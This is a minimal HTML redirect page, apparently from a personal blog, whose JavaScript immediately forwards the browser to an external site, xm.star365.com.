<html>
<head>
    <title>跳转中</title>
</head>
<body>
   <p></p>
</body>

</html>
<script language="javascript" type="text/javascript">
    // 以下方式直接跳转
    //飞鸟慕鱼博客
    //  window.location.href = 'https://xm.star365.com/';
    // 五秒以后再跳转
    var url = 'https://xm.star365.com/';

    window.setTimeout(function () {
        window.location.href = url.replace(/[a][m][p][\;]/g, '')
    }, 0)

</script>
